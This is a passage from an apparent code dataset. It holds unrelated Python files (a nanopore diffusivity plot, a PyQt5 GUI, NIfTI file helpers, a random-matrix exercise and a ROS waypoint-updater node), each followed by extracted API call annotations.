    plt.ylabel('diffusivity relative to bulk')
    plt.legend(loc='lower left')
    plt.tight_layout()
    # Agg backend is headless, so the figure is only written to disk.
    plt.savefig('get_new.png')
| [
"nanopores.tools.fields.get_fields",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.ylabel",
"matplotlib.use",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"os.path.join",
"scipy.interpolate.interp1d",
"numpy.inner",
"numpy.array",
"numpy.linspace",
"num... | [((18, 39), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (32, 39), False, 'import matplotlib\n'), ((188, 211), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (206, 211), False, 'import os\n'), ((222, 274), 'os.path.join', 'os.path.join', (['HOME', '"""Dropbox"""', '"""nanopores"""', '"""fields"""'], {}), "(HOME, 'Dropbox', 'nanopores', 'fields')\n", (234, 274), False, 'import os\n'), ((275, 298), 'nanopores.tools.fields.set_dir', 'fields.set_dir', (['DATADIR'], {}), '(DATADIR)\n', (289, 298), False, 'from nanopores.tools import fields\n'), ((307, 376), 'nanopores.tools.fields.get_fields', 'fields.get_fields', (['"""pugh_diff3D_cross"""'], {'bulkbc': '(True)', 'rMolecule': '(2.0779)'}), "('pugh_diff3D_cross', bulkbc=True, rMolecule=2.0779)\n", (324, 376), False, 'from nanopores.tools import fields\n'), ((1053, 1076), 'nanopores.tools.fields._sorted', 'fields._sorted', (['data', 'x'], {}), '(data, x)\n', (1067, 1076), False, 'from nanopores.tools import fields\n'), ((1732, 1748), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'Dxx'], {}), '(x, Dxx)\n', (1740, 1748), False, 'from scipy.interpolate import interp1d\n'), ((1753, 1769), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'Dyy'], {}), '(x, Dyy)\n', (1761, 1769), False, 'from scipy.interpolate import interp1d\n'), ((1774, 1790), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'Dzz'], {}), '(x, Dzz)\n', (1782, 1790), False, 'from scipy.interpolate import interp1d\n'), ((2044, 2061), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'DDxx'], {}), '(x, DDxx)\n', (2052, 2061), False, 'from scipy.interpolate import interp1d\n'), ((2067, 2084), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'DDyy'], {}), '(x, DDyy)\n', (2075, 2084), False, 'from scipy.interpolate import interp1d\n'), ((2090, 2107), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'DDzz'], {}), '(x, DDzz)\n', (2098, 2107), False, 'from scipy.interpolate import interp1d\n'), ((399, 
410), 'numpy.array', 'np.array', (['l'], {}), '(l)\n', (407, 410), True, 'import numpy as np\n'), ((430, 467), 'numpy.array', 'np.array', (['[1.0 / 3, 1.0 / 3, 1.0 / 3]'], {}), '([1.0 / 3, 1.0 / 3, 1.0 / 3])\n', (438, 467), True, 'import numpy as np\n'), ((601, 612), 'numpy.array', 'np.array', (['l'], {}), '(l)\n', (609, 612), True, 'import numpy as np\n'), ((632, 667), 'numpy.array', 'np.array', (['[0.2, 0.2, 0.2, 0.2, 0.2]'], {}), '([0.2, 0.2, 0.2, 0.2, 0.2])\n', (640, 667), True, 'import numpy as np\n'), ((803, 814), 'numpy.array', 'np.array', (['l'], {}), '(l)\n', (811, 814), True, 'import numpy as np\n'), ((834, 874), 'numpy.array', 'np.array', (['[10.0, 12.0, 15.0, 12.0, 10.0]'], {}), '([10.0, 12.0, 15.0, 12.0, 10.0])\n', (842, 874), True, 'import numpy as np\n'), ((2137, 2163), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1.0)', '(100)'], {}), '(0.0, 1.0, 100)\n', (2148, 2163), True, 'import numpy as np\n'), ((2161, 2208), 'matplotlib.pyplot.plot', 'plt.plot', (['x_', 'Dxx_'], {'color': '"""blue"""', 'linestyle': '""":"""'}), "(x_, Dxx_, color='blue', linestyle=':')\n", (2169, 2208), True, 'from matplotlib import pyplot as plt\n'), ((2207, 2242), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x_', 'Dxx_'], {'color': '"""blue"""'}), "(x_, Dxx_, color='blue')\n", (2218, 2242), True, 'from matplotlib import pyplot as plt\n'), ((2242, 2275), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'Dxx'], {'color': '"""blue"""'}), "(x, Dxx, color='blue')\n", (2253, 2275), True, 'from matplotlib import pyplot as plt\n'), ((2382, 2416), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'DDxx'], {'color': '"""blue"""'}), "(x, DDxx, color='blue')\n", (2393, 2416), True, 'from matplotlib import pyplot as plt\n'), ((2486, 2532), 'matplotlib.pyplot.plot', 'plt.plot', (['x_', 'Dyy_'], {'color': '"""red"""', 'linestyle': '""":"""'}), "(x_, Dyy_, color='red', linestyle=':')\n", (2494, 2532), True, 'from matplotlib import pyplot as plt\n'), ((2531, 2565), 
'matplotlib.pyplot.scatter', 'plt.scatter', (['x_', 'Dyy_'], {'color': '"""red"""'}), "(x_, Dyy_, color='red')\n", (2542, 2565), True, 'from matplotlib import pyplot as plt\n'), ((2565, 2597), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'Dyy'], {'color': '"""red"""'}), "(x, Dyy, color='red')\n", (2576, 2597), True, 'from matplotlib import pyplot as plt\n'), ((2702, 2735), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'DDyy'], {'color': '"""red"""'}), "(x, DDyy, color='red')\n", (2713, 2735), True, 'from matplotlib import pyplot as plt\n'), ((2803, 2851), 'matplotlib.pyplot.plot', 'plt.plot', (['x_', 'Dzz_'], {'color': '"""green"""', 'linestyle': '""":"""'}), "(x_, Dzz_, color='green', linestyle=':')\n", (2811, 2851), True, 'from matplotlib import pyplot as plt\n'), ((2850, 2886), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x_', 'Dzz_'], {'color': '"""green"""'}), "(x_, Dzz_, color='green')\n", (2861, 2886), True, 'from matplotlib import pyplot as plt\n'), ((2886, 2920), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'Dzz'], {'color': '"""green"""'}), "(x, Dzz, color='green')\n", (2897, 2920), True, 'from matplotlib import pyplot as plt\n'), ((3029, 3064), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'DDzz'], {'color': '"""green"""'}), "(x, DDzz, color='green')\n", (3040, 3064), True, 'from matplotlib import pyplot as plt\n'), ((3136, 3180), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""distance from pore center [nm]"""'], {}), "('distance from pore center [nm]')\n", (3146, 3180), True, 'from matplotlib import pyplot as plt\n'), ((3182, 3224), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""diffusivity relative to bulk"""'], {}), "('diffusivity relative to bulk')\n", (3192, 3224), True, 'from matplotlib import pyplot as plt\n'), ((3226, 3254), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower left"""'}), "(loc='lower left')\n", (3236, 3254), True, 'from matplotlib import pyplot as plt\n'), ((3256, 3274), 
'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3272, 3274), True, 'from matplotlib import pyplot as plt\n'), ((3276, 3302), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""get_new.png"""'], {}), "('get_new.png')\n", (3287, 3302), True, 'from matplotlib import pyplot as plt\n'), ((533, 566), 'numpy.inner', 'np.inner', (['A[i - n:i + n + 1]', 'ker'], {}), '(A[i - n:i + n + 1], ker)\n', (541, 566), True, 'import numpy as np\n'), ((735, 768), 'numpy.inner', 'np.inner', (['A[i - n:i + n + 1]', 'ker'], {}), '(A[i - n:i + n + 1], ker)\n', (743, 768), True, 'import numpy as np\n'), ((878, 889), 'numpy.sum', 'np.sum', (['ker'], {}), '(ker)\n', (884, 889), True, 'import numpy as np\n'), ((966, 999), 'numpy.inner', 'np.inner', (['A[i - n:i + n + 1]', 'ker'], {}), '(A[i - n:i + n + 1], ker)\n', (974, 999), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'hnc.ui'
#
# Created by: PyQt5 UI code generator 5.15.6
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(QtWidgets.QMainWindow):
    """Main window: one large round button plus a status label.

    *cc* is a pipe-like connection object — it is only used via poll/recv/send,
    so presumably one end of a multiprocessing.Pipe (confirm against the
    caller). *tm* is a QTimer whose timeout drives the status-label refresh.
    """
    def __init__(self, cc, tm, parent=None):
        super().__init__(parent)
        self.cc = cc
        self.setupUi(self)
        self.tm = tm
        self.connect_signals()
    def update_stlbl(self):
        """If the connection has data pending, show the received text in the status label."""
        if self.cc.poll():
            msg = self.cc.recv()
            self.statuslbl.setText(msg)
    def comm(self):
        """Send the "listen" command over the connection (button handler)."""
        self.cc.send("listen")
    def connect_signals(self):
        """Wire the button click and the timer tick to their handlers."""
        self.pushButton.clicked.connect(self.comm)
        self.tm.timeout.connect(self.update_stlbl)
    def setupUi(self, MainWindow):
        """Build the widget tree (generated by pyuic5 from hnc.ui — avoid manual edits)."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(365, 403)
        MainWindow.setStyleSheet("background-color: rgb(53, 53, 53);")
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # Big round green push button (radius comes from the stylesheet below).
        self.pushButton = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton.setGeometry(QtCore.QRect(110, 230, 150, 150))
        self.pushButton.setMinimumSize(QtCore.QSize(40, 40))
        self.pushButton.setMaximumSize(QtCore.QSize(16777215, 16777215))
        self.pushButton.setStyleSheet("QPushButton {\n"
"     color: rgb(39, 212, 111);\n"
"     border: 2px solid #555;\n"
"     border-radius: 75px;\n"
"     border-style: outset;\n"
"     background:rgb(58, 255, 81);\n"
"     padding: 5px;\n"
"     }\n"
"\n"
"QPushButton:hover {\n"
"     background: rgb(63, 231, 74)\n"
"     }\n"
"\n"
"QPushButton:pressed {\n"
"     border-style: inset;\n"
"     background: rgb(53, 221, 64)\n"
"     }")
        self.pushButton.setText("")
        self.pushButton.setIconSize(QtCore.QSize(40, 40))
        self.pushButton.setObjectName("pushButton")
        # Title label ("pyTunes", set in retranslateUi).
        self.label = QtWidgets.QLabel(self.centralwidget)
        self.label.setGeometry(QtCore.QRect(29, 30, 81, 31))
        self.label.setStyleSheet("font: 25 20pt \"Bahnschrift Light Condensed\";\n"
"color: rgb(96, 255, 60);")
        self.label.setObjectName("label")
        # Status label, refreshed from the connection by update_stlbl().
        self.statuslbl = QtWidgets.QLabel(self.centralwidget)
        self.statuslbl.setGeometry(QtCore.QRect(30, 180, 500, 31))
        self.statuslbl.setStyleSheet("font: 25 15pt \"Bahnschrift Light Condensed\";\n"
"color: rgb(96, 255, 60);")
        self.statuslbl.setText("")
        self.statuslbl.setObjectName("statuslbl")
        MainWindow.setCentralWidget(self.centralwidget)
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Apply the translatable UI strings (pyuic5-generated)."""
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", " "))
        self.label.setText(_translate("MainWindow", "pyTunes"))
        self.statuslbl.setText(_translate("MainWindow", "Press the button to begin.."))
def uifunc(cc):
    """Launch the Qt GUI for pipe connection *cc* and block until it closes.

    A 1000 ms QTimer drives Ui_MainWindow's periodic poll of *cc* for
    status-label updates. Returns when the Qt event loop exits.
    """
    app = QtWidgets.QApplication([])
    tm = QtCore.QTimer()
    win = Ui_MainWindow(cc, tm)
    win.show()
    # Fire once per second so the window can poll the connection.
    tm.start(1000)
    app.exec()
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtCore.QTimer",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.QtCore.QSize"
] | [((3802, 3828), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['[]'], {}), '([])\n', (3824, 3828), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3838, 3853), 'PyQt5.QtCore.QTimer', 'QtCore.QTimer', ([], {}), '()\n', (3851, 3853), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1088, 1117), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['MainWindow'], {}), '(MainWindow)\n', (1105, 1117), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1202, 1243), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1223, 1243), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2656, 2692), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2672, 2692), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2966, 3002), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2982, 3002), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3412, 3461), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['MainWindow'], {}), '(MainWindow)\n', (3449, 3461), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1280, 1312), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(110)', '(230)', '(150)', '(150)'], {}), '(110, 230, 150, 150)\n', (1292, 1312), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1353, 1373), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(40)', '(40)'], {}), '(40, 40)\n', (1365, 1373), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1414, 1446), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(16777215)', '(16777215)'], {}), '(16777215, 16777215)\n', (1426, 1446), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2561, 2581), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(40)', '(40)'], {}), '(40, 40)\n', (2573, 2581), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2724, 2752), 
'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(29)', '(30)', '(81)', '(31)'], {}), '(29, 30, 81, 31)\n', (2736, 2752), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3038, 3068), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(30)', '(180)', '(500)', '(31)'], {}), '(30, 180, 500, 31)\n', (3050, 3068), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')] |
import os
import nibabel
import numpy as np
import random
from scipy import ndimage
import SimpleITK as sitk
def load_nifty_volume_as_array(filename, with_header = False):
    """
    load nifty image into numpy array, and transpose it based on the [z,y,x] axis order
    The output array shape is like [Depth, Height, Width]
    inputs:
        filename: the input file name, should be *.nii or *.nii.gz
        with_header: also return affine and header information
    outputs:
        data: a numpy data array
        (data, affine, header) when with_header is True
    """
    img = nibabel.load(filename)
    # img.get_data() is deprecated (removed in nibabel 5). np.asanyarray on
    # the dataobj yields the same array without the forced float64 cast that
    # get_fdata() would introduce.
    data = np.asanyarray(img.dataobj)
    # Reorder axes from nibabel's [x, y, z] to [z, y, x] = [Depth, Height, Width].
    data = np.transpose(data, [2, 1, 0])
    if with_header:
        return data, img.affine, img.header
    return data
def save_array_as_nifty_volume(data, filename, reference_name = None):
    """Write a numpy array to disk as a nifty volume.

    inputs:
        data: a numpy array with shape [Depth, Height, Width]
        filename: the output file name
        reference_name: optional reference image whose affine and header
            (spacing, origin, direction) are copied onto the output
    outputs: None
    """
    volume = sitk.GetImageFromArray(data)
    if reference_name is not None:
        # Inherit the spatial metadata from the reference image.
        reference = sitk.ReadImage(reference_name)
        volume.CopyInformation(reference)
    sitk.WriteImage(volume, filename)
| [
"SimpleITK.GetImageFromArray",
"nibabel.load",
"SimpleITK.WriteImage",
"SimpleITK.ReadImage",
"numpy.transpose"
] | [((529, 551), 'nibabel.load', 'nibabel.load', (['filename'], {}), '(filename)\n', (541, 551), False, 'import nibabel\n'), ((589, 618), 'numpy.transpose', 'np.transpose', (['data', '[2, 1, 0]'], {}), '(data, [2, 1, 0])\n', (601, 618), True, 'import numpy as np\n'), ((1071, 1099), 'SimpleITK.GetImageFromArray', 'sitk.GetImageFromArray', (['data'], {}), '(data)\n', (1093, 1099), True, 'import SimpleITK as sitk\n'), ((1226, 1256), 'SimpleITK.WriteImage', 'sitk.WriteImage', (['img', 'filename'], {}), '(img, filename)\n', (1241, 1256), True, 'import SimpleITK as sitk\n'), ((1154, 1184), 'SimpleITK.ReadImage', 'sitk.ReadImage', (['reference_name'], {}), '(reference_name)\n', (1168, 1184), True, 'import SimpleITK as sitk\n')] |
from random import randint
# Build a 3x3 grid of random integers in [0, 100], print it, then report:
# the sum of the even entries, the sum of the third column, and the
# largest value of the second row.
matriz = [[randint(0, 100) for _ in range(3)] for _ in range(3)]
soma_pares = 0
soma_coluna3 = 0
print('-=' * 15)
for linha in matriz:
    for valor in linha:
        print(f'[{valor:^5}]', end='')
        if valor % 2 == 0:
            soma_pares += valor
    print()
    soma_coluna3 += linha[2]
maior_linha2 = max(matriz[1])
print('-=' * 15)
print(f'A soma dos núemros pares é {soma_pares}')
print(f'A soma dos valores da terceira coluna é {soma_coluna3}')
print(f'O maior valor da segunda linha é {maior_linha2}')
print(f'O maior valor da segunda linha é {ma}') | [
"random.randint"
] | [((146, 161), 'random.randint', 'randint', (['(0)', '(100)'], {}), '(0, 100)\n', (153, 161), False, 'from random import randint\n')] |
#!/usr/bin/env python
import rospy as rp
import numpy as np
import math as math
from geometry_msgs.msg import PoseStamped, TwistStamped
from styx_msgs.msg import Lane, Waypoint
from scipy.spatial import KDTree
from std_msgs.msg import Int32
'''
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO (for Yousuf and Aaron): Stopline location for each traffic light.
'''
# Number of waypoints we will publish.
LOOKAHEAD_WPS = 150
# Maximum deceleration magnitude; declared but not referenced in this file as written.
MAX_DECEL = 0.5
class MotionState( ):
    """Enumeration of the planner's longitudinal motion states."""
    # Plain integer constants (0 and 1) — cheap to compare in the 10 Hz loop.
    Go = 0
    Stop = 1
class WaypointUpdater( object ):
    """ROS node that republishes the next LOOKAHEAD_WPS base waypoints ahead
    of the vehicle on `final_waypoints`, with target velocities shaped either
    to accelerate toward the base speed or to decelerate to a stop at the
    red light reported on /traffic_waypoint.
    """
    def __init__( self ):
        rp.init_node( 'waypoint_updater' )
        # TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below
        rp.Subscriber( '/current_pose', PoseStamped, self.pose_cb )
        rp.Subscriber( '/base_waypoints', Lane, self.waypoints_cb )
        rp.Subscriber( '/traffic_waypoint', Int32, self.traffic_cb )
        rp.Subscriber( '/current_velocity', TwistStamped, self.velocity_cb )
        self.final_waypoints_pub = rp.Publisher(
            'final_waypoints',
            Lane,
            queue_size=1 )
        # TODO: Add other member variables you need below
        self.base_lane = None        # full list of track waypoints (set once)
        self.pose = None             # latest vehicle pose (PoseStamped)
        self.waypoints_2d = None     # [x, y] per base waypoint, KD-tree input
        self.waypoint_tree = None    # KDTree over waypoints_2d
        self.nearest_light = None    # waypoint index of the next red light's stop line
        self.vehicle_velocity = None # in m/s
        self.motion_state = MotionState.Go
        self.deceleration_rate = None # computed lazily once a stop begins
        # NOTE(review): despite the unit comment below, accelerate() applies this
        # as a velocity gain per meter of travel, i.e. (m/s) per m.
        self.acceleration_rate = 0.75 # m/s
        self.previous_velocity = None # velocity observed on the previous loop cycle
        self.loop( )                 # blocks here until node shutdown
    def loop( self ):
        """Publish at 10 Hz once pose, base waypoints and KD-tree are available."""
        rate = rp.Rate( 10 )
        while not rp.is_shutdown( ):
            if self.pose and self.base_lane and self.waypoint_tree:
                # get closest waypoint
                #closest_waypoint_index = self.get_closest_waypoint_id( )
                self.publish_waypoints( )
            # Remember this cycle's velocity for the acceleration ramp.
            self.previous_velocity = self.vehicle_velocity
            rate.sleep( )
    def publish_waypoints( self ):
        """Publish a freshly generated Lane on final_waypoints."""
        self.final_waypoints_pub.publish( self.generate_lane( ) )
    def generate_lane( self ):
        """Slice LOOKAHEAD_WPS waypoints ahead of the car and shape velocities.

        A red light inside the lookahead window switches to a deceleration
        profile; otherwise an acceleration ramp is applied whenever the car
        is more than 1 m/s away from the first waypoint's target speed.
        """
        lane = Lane( )
        closest_idx = self.get_closest_waypoint_id( )
        farthest_idx = closest_idx + LOOKAHEAD_WPS
        base_waypoints = self.base_lane[ closest_idx:farthest_idx ]
        if self.nearest_light != None and \
           self.nearest_light <= farthest_idx and \
           self.nearest_light >= closest_idx:
            self.motion_state = MotionState.Stop
            base_waypoints = self.decelerate( base_waypoints, closest_idx )
        elif self.motion_state == MotionState.Stop:
            # Light cleared or left the window: drop the stop profile.
            self.motion_state = MotionState.Go
            self.deceleration_rate = None
        if self.motion_state == MotionState.Go:
            if abs( self.vehicle_velocity - self.get_waypoint_velocity( \
                    base_waypoints[ 0 ] ) ) > 1.0:
                if self.previous_velocity == None:
                    start_vel = self.vehicle_velocity
                else:
                    # Ramp from at least 0.2 m/s above last cycle's velocity.
                    start_vel = max(
                        self.previous_velocity + 0.2,
                        self.vehicle_velocity )
                base_waypoints = self.accelerate( base_waypoints, start_vel )
            else:
                # NOTE(review): this attribute is never read in this file and is
                # not initialized in __init__ — looks like dead code.
                self.acceleration_start_velocity = None
        lane.waypoints = base_waypoints
        return lane
    def accelerate( self, waypoints, start_velocity ):
        """Return copies of *waypoints* carrying a linear acceleration ramp.

        The target velocity grows with travelled distance from
        start_velocity (floored at 0.5 m/s) and is capped by each
        waypoint's base target velocity.
        """
        new_waypoints = [ ]
        for i, wp in enumerate( waypoints ):
            p = Waypoint( )
            p.pose = wp.pose
            distance = self.distance( waypoints, 0, i )
            target_vel = start_velocity + distance * self.acceleration_rate
            if target_vel < 0.5:
                target_vel = 0.5
            p.twist.twist.linear.x = min(
                target_vel,
                self.get_waypoint_velocity( wp ) )
            new_waypoints.append( p )
        return new_waypoints
    def decelerate( self, waypoints, start_idx ):
        """Return copies of *waypoints* whose velocities taper to zero at the light.

        Waypoints at/after the stop index get zero velocity; within 15 m of
        it the speed falls linearly with the remaining distance (snapped to
        0 below 1 m/s); farther away the base velocity is kept.
        """
        new_waypoints = [ ]
        speed = self.vehicle_velocity # NOTE(review): unused local
        # two waypoints back from line so front of car stops earlier
        stop_idx = self.nearest_light - start_idx - 2
        for i, wp in enumerate( waypoints ):
            p = Waypoint( )
            p.pose = wp.pose
            dist = self.distance( waypoints, i, stop_idx )
            if i >= stop_idx:
                target_vel = 0
            elif dist < 15:
                # Fix the deceleration slope on the first cycle of the stop.
                if self.deceleration_rate == None:
                    self.deceleration_rate = self.vehicle_velocity / dist
                target_vel = self.deceleration_rate * dist
                if target_vel <= 1.0:
                    target_vel = 0.0
                target_vel = min( target_vel, self.get_waypoint_velocity( wp ) )
            else:
                target_vel = self.get_waypoint_velocity( wp )
            p.twist.twist.linear.x = target_vel
            new_waypoints.append( p )
        return new_waypoints
    def get_closest_waypoint_id( self ):
        """Index of the nearest base waypoint that lies ahead of the vehicle."""
        x = self.pose.pose.position.x
        y = self.pose.pose.position.y
        closest_idx = self.waypoint_tree.query( [x, y], 1 )[1]
        # Check if closest waypoint is ahead or behind the vehicle
        closest_wp = np.array( self.waypoints_2d[ closest_idx ] )
        previous_wp = np.array( self.waypoints_2d[ closest_idx - 1 ] )
        # Equation for hyperplane through closest_coords
        waypoint_vector = closest_wp - previous_wp
        position_vector = np.array( [x, y] ) - closest_wp
        val = np.dot( waypoint_vector, position_vector )
        if val > 0:
            # Positive projection => the waypoint is behind us; take the next one.
            closest_idx = ( closest_idx + 1 ) % len( self.waypoints_2d )
        return closest_idx
    def pose_cb(self, msg):
        """Store the latest vehicle pose."""
        # TODO: Implement
        self.pose = msg
    def waypoints_cb( self, waypoints ):
        """Cache the base waypoints and build a KD-tree over their xy positions."""
        # TODO: Implement
        self.base_lane = waypoints.waypoints
        if not self.waypoints_2d:
            self.waypoints_2d = [ [ waypoint.pose.pose.position.x,
                                    waypoint.pose.pose.position.y ]
                                  for waypoint in waypoints.waypoints ]
            self.waypoint_tree = KDTree( self.waypoints_2d )
    def traffic_cb( self, msg ):
        """Record the stop-line waypoint index of the nearest red light (-1 = none)."""
        # TODO: Callback for /traffic_waypoint message. Implement
        if( msg.data == -1 ):
            self.nearest_light = None
        else:
            self.nearest_light = msg.data
    def velocity_cb( self, velocity ):
        """Store the current longitudinal velocity in m/s."""
        self.vehicle_velocity = velocity.twist.linear.x
    def obstacle_cb(self, msg):
        """Placeholder for obstacle handling (not implemented)."""
        # TODO: Callback for /obstacle_waypoint message. We will implement it later
        pass
    def get_waypoint_velocity( self, waypoint ):
        """Target linear velocity stored on a waypoint."""
        return waypoint.twist.twist.linear.x
    def set_waypoint_velocity( self, waypoints, waypoint, velocity ):
        """Overwrite the target linear velocity of waypoints[waypoint]."""
        waypoints[ waypoint ].twist.twist.linear.x = velocity
    def distance(self, waypoints, wp1, wp2):
        """Cumulative Euclidean path length from index wp1 to wp2 (assumes wp1 <= wp2)."""
        dist = 0
        dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)
        for i in range(wp1, wp2+1):
            dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
            wp1 = i
        return dist
def main():
    """Entry point: constructing the node starts its publish loop."""
    WaypointUpdater()

if __name__ == '__main__':
    try:
        main()
    except rp.ROSInterruptException:
        rp.logerr('Could not start waypoint updater node.')
| [
"rospy.logerr",
"rospy.Subscriber",
"rospy.is_shutdown",
"rospy.init_node",
"scipy.spatial.KDTree",
"math.sqrt",
"numpy.array",
"numpy.dot",
"rospy.Rate",
"styx_msgs.msg.Waypoint",
"rospy.Publisher",
"styx_msgs.msg.Lane"
] | [((1071, 1103), 'rospy.init_node', 'rp.init_node', (['"""waypoint_updater"""'], {}), "('waypoint_updater')\n", (1083, 1103), True, 'import rospy as rp\n'), ((1199, 1256), 'rospy.Subscriber', 'rp.Subscriber', (['"""/current_pose"""', 'PoseStamped', 'self.pose_cb'], {}), "('/current_pose', PoseStamped, self.pose_cb)\n", (1212, 1256), True, 'import rospy as rp\n'), ((1267, 1324), 'rospy.Subscriber', 'rp.Subscriber', (['"""/base_waypoints"""', 'Lane', 'self.waypoints_cb'], {}), "('/base_waypoints', Lane, self.waypoints_cb)\n", (1280, 1324), True, 'import rospy as rp\n'), ((1335, 1393), 'rospy.Subscriber', 'rp.Subscriber', (['"""/traffic_waypoint"""', 'Int32', 'self.traffic_cb'], {}), "('/traffic_waypoint', Int32, self.traffic_cb)\n", (1348, 1393), True, 'import rospy as rp\n'), ((1404, 1470), 'rospy.Subscriber', 'rp.Subscriber', (['"""/current_velocity"""', 'TwistStamped', 'self.velocity_cb'], {}), "('/current_velocity', TwistStamped, self.velocity_cb)\n", (1417, 1470), True, 'import rospy as rp\n'), ((1509, 1560), 'rospy.Publisher', 'rp.Publisher', (['"""final_waypoints"""', 'Lane'], {'queue_size': '(1)'}), "('final_waypoints', Lane, queue_size=1)\n", (1521, 1560), True, 'import rospy as rp\n'), ((2099, 2110), 'rospy.Rate', 'rp.Rate', (['(10)'], {}), '(10)\n', (2106, 2110), True, 'import rospy as rp\n'), ((2613, 2619), 'styx_msgs.msg.Lane', 'Lane', ([], {}), '()\n', (2617, 2619), False, 'from styx_msgs.msg import Lane, Waypoint\n'), ((5765, 5805), 'numpy.array', 'np.array', (['self.waypoints_2d[closest_idx]'], {}), '(self.waypoints_2d[closest_idx])\n', (5773, 5805), True, 'import numpy as np\n'), ((5832, 5876), 'numpy.array', 'np.array', (['self.waypoints_2d[closest_idx - 1]'], {}), '(self.waypoints_2d[closest_idx - 1])\n', (5840, 5876), True, 'import numpy as np\n'), ((6063, 6103), 'numpy.dot', 'np.dot', (['waypoint_vector', 'position_vector'], {}), '(waypoint_vector, position_vector)\n', (6069, 6103), True, 'import numpy as np\n'), ((2132, 2148), 
